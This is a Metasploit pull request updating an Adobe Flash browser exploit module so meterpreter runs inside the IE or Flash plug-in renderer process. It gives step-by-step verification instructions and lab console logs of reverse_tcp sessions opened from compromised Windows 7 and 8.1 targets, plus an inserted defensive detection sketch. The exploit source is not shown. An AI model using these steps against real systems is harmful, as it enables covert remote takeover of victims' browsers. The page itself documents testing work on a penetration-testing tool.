adobe_flash_copy_pixels_to_byte_array: Execution from the flash renderer / Windows 8.1 #5486

Merged
merged 2 commits into from
Jun 5, 2015

Conversation

jvazquez-r7
Contributor

This PR modifies modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb to allow native payload execution from the flash renderer process. So no more powershell. We execute meterpreter directly and we remain in the same flash renderer process.

It also adds support for:

  • Firefox / Adobe Flash plug-in on Windows 7 SP1 (32 bits).
  • Firefox / Adobe Flash plug-in on Windows 8.1

On the other hand, updates adobe_flash_copy_pixels_to_byte_array, adobe_flash_uncompress_zlib_uaf and adobe_flash_net_connection_confusion with GreatRanking since all of them are getting native code execution in the same renderer process without crashing it. And has a good version coverage for Adobe Flash. <-- ping @wchen-r7 let me know if you'd like to discuss something about the criteria!

Verification

  • Install a Windows 7 target: Windows 7 SP1 / IE 11 / Adobe Flash 14.0.0.176 (ActiveX) / Firefox 38.0.5 / Adobe Flash 14.0.0.179 (plugin)
  • Install a Windows 8.1 target: Windows 8 SP1 (32 bits or 64 bits), Firefox 38.0.5 (32 bits) and Flash 14.0.0.179 (Plug-in)
  • Run msfconsole and use the module modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array
  • Run the module with the windows target and windows/meterpreter/reverse_tcp payload
  • Visit the page from Windows 7 SP1 / IE 11 / Adobe Flash 14.0.0.176 (ActiveX), verify that you get a session and that it lives inside the IE renderer process:
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/nz48jvfnBMpVNHC
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /nz48jvfnBMpVNHC/rdRjmD/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /nz48jvfnBMpVNHC/rdRjmD/tkpM.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 6 opened (172.16.158.1:4444 -> 172.16.158.131:51400) at 2015-06-04 18:11:41 -0500

msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 2264
meterpreter > ps -S 2264


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 2264  iexplore.exe                        x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Program Files\Internet Explorer\iexplore.exe


meterpreter >
  • Visit the page from Windows 7 SP1 / Firefox / Adobe Flash 14.0.0.179 (plugin), verify that you get a session and that it lives inside the Flash renderer process:
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/zPqiSaM
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /zPqiSaM/sopMhI/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /zPqiSaM/sopMhI/VZeUfv.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 8 opened (172.16.158.1:4444 -> 172.16.158.131:51415) at 2015-06-04 18:13:46 -0500

msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions -i 8
[*] Starting interaction with 8...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 5868
meterpreter > ps -S 5868


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 5868  FlashPlayerPlugin_14_0_0_179.exe    x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_14_0_0_179.exe


meterpreter >
  • Visit the page from Windows 8.1 / Firefox 38.0.5 / Adobe Flash 14.0.0.179 (Plugin), verify that you get a session and that it lives inside the Flash renderer process:
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Request: /zPqiSaM/sopMhI/
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Request: /zPqiSaM/sopMhI/OdgB.swf
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.132
[*] Meterpreter session 9 opened (172.16.158.1:4444 -> 172.16.158.132:50807) at 2015-06-04 18:21:56 -0500

msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions -i 9
[*] Starting interaction with 9...

meterpreter > sysinfo
Computer        : WIN-U7MBH836GNO
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 1028
meterpreter > ps -S 1028


Process list
============

 PID   Name                              Arch  Session  User                  Path
 ---   ----                              ----  -------  ----                  ----
 1028  FlashPlayerPlugin_14_0_0_179.exe  x86   1        WIN-U7MBH836GNO\juan  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_14_0_0_179.exe


meterpreter > exit
[*] Shutting down Meterpreter...
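The verification above shows the security-relevant consequence of this change for defenders: the payload no longer spawns powershell.exe, so the only host-side trace is the renderer itself (iexplore.exe for the ActiveX control, FlashPlayerPlugin_14_0_0_179.exe for the Firefox plug-in) opening the reverse_tcp connection. The following detection sketch is an added example, not code from the PR or from Metasploit; it assumes a constructed one-event-per-line telemetry format and an assumed allow-list of ports a renderer normally talks to.

```python
import re

# Constructed telemetry (not from the page): "<event>|<pid>|<image>|<detail>".
# Image names mirror the renderer processes in the PR's ps output; addresses are the PR's lab values.
SAMPLE_EVENTS = """\
ProcessCreate|2264|C:\\Program Files\\Internet Explorer\\iexplore.exe|parent=explorer.exe
NetworkConnect|2264|C:\\Program Files\\Internet Explorer\\iexplore.exe|dst=172.16.158.1:8080
NetworkConnect|2264|C:\\Program Files\\Internet Explorer\\iexplore.exe|dst=172.16.158.1:4444
ProcessCreate|5868|C:\\Windows\\system32\\Macromed\\Flash\\FlashPlayerPlugin_14_0_0_179.exe|parent=firefox.exe
NetworkConnect|5868|C:\\Windows\\system32\\Macromed\\Flash\\FlashPlayerPlugin_14_0_0_179.exe|dst=172.16.158.1:4444
NetworkConnect|3100|C:\\Program Files\\Mozilla Firefox\\firefox.exe|dst=93.184.216.34:443
ProcessCreate|7012|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|parent=iexplore.exe
"""

# Processes that host Flash content: the IE ActiveX host and the Firefox plug-in broker.
RENDERER_RE = re.compile(r"(iexplore\.exe|FlashPlayerPlugin_\d+_\d+_\d+_\d+\.exe)$", re.I)
BROWSER_RE = re.compile(r"(iexplore|firefox)\.exe$", re.I)
# Assumed allow-list: ports a renderer is expected to reach; anything else is worth a look.
WEB_PORTS = {80, 443, 8080}

def parse_event(line):
    event, pid, image, detail = line.split("|", 3)
    return {"event": event, "pid": int(pid), "image": image, "detail": detail}

def find_renderer_beacons(log_text):
    """(pid, image, dst) for renderer processes connecting outside WEB_PORTS: the trace an in-process payload leaves."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev["event"] != "NetworkConnect" or not RENDERER_RE.search(ev["image"]):
            continue
        dst = ev["detail"].split("=", 1)[1]
        port = int(dst.rsplit(":", 1)[1])
        if port not in WEB_PORTS:
            hits.append((ev["pid"], ev["image"].rsplit("\\", 1)[1], dst))
    return hits

def find_browser_spawned_powershell(log_text):
    """The older indicator (a browser launching powershell.exe); this PR's change no longer triggers it."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev["event"] == "ProcessCreate" and ev["image"].lower().endswith("powershell.exe"):
            parent = ev["detail"].split("=", 1)[1]
            if BROWSER_RE.search(parent):
                hits.append((ev["pid"], parent))
    return hits
```

Run over the constructed events, the first function flags both renderer PIDs from the PR's sessions (2264 and 5868) on their 4444 connections while ignoring the 8080 exploit-server fetch, and the second only fires for the constructed powershell.exe line, which this PR's module would no longer produce.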

@OJ
Contributor

OJ commented Jun 4, 2015

excited

@wchen-r7 wchen-r7 self-assigned this Jun 4, 2015
@wchen-r7
Contributor

wchen-r7 commented Jun 4, 2015

I'll test this in a bit.

@wchen-r7
Contributor

wchen-r7 commented Jun 5, 2015

Windows 7:

msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://0.0.0.0:8080/xTjS7ewIX5BEmG
[*] Local IP: http://192.168.1.64:8080/xTjS7ewIX5BEmG
[*] Server started.
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Request: /xTjS7ewIX5BEmG/NSjpxY/
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Request: /xTjS7ewIX5BEmG/NSjpxY/yVelC.swf
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (884270 bytes) to 192.168.1.168
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.168:49342) at 2015-06-04 23:24:08 -0500

Windows 8.1

msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://0.0.0.0:8080/Xz1Qa41qVY1ihoX
[*] Local IP: http://192.168.1.64:8080/Xz1Qa41qVY1ihoX
[*] Server started.
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Request: /Xz1Qa41qVY1ihoX/dzmJba/
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Request: /Xz1Qa41qVY1ihoX/dzmJba/oBvJ.swf
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (884270 bytes) to 192.168.1.138
[*] Meterpreter session 3 opened (192.168.1.64:4444 -> 192.168.1.138:50815) at 2015-06-04 23:30:08 -0500

@wchen-r7
Contributor

wchen-r7 commented Jun 5, 2015

On the other hand, updates adobe_flash_copy_pixels_to_byte_array, adobe_flash_uncompress_zlib_uaf and adobe_flash_net_connection_confusion with GreatRanking since all of them are getting native code execution in the same renderer process without crashing it. And has a good version coverage for Adobe Flash. <-- ping @wchen-r7 let me know if you'd like to discuss something about the criteria!

Yeah that sounds good. That's what I recommended earlier too. I'll bump them.

Never mind, they are already GreatRanking.

@wchen-r7 wchen-r7 merged commit 51d98e1 into rapid7:master Jun 5, 2015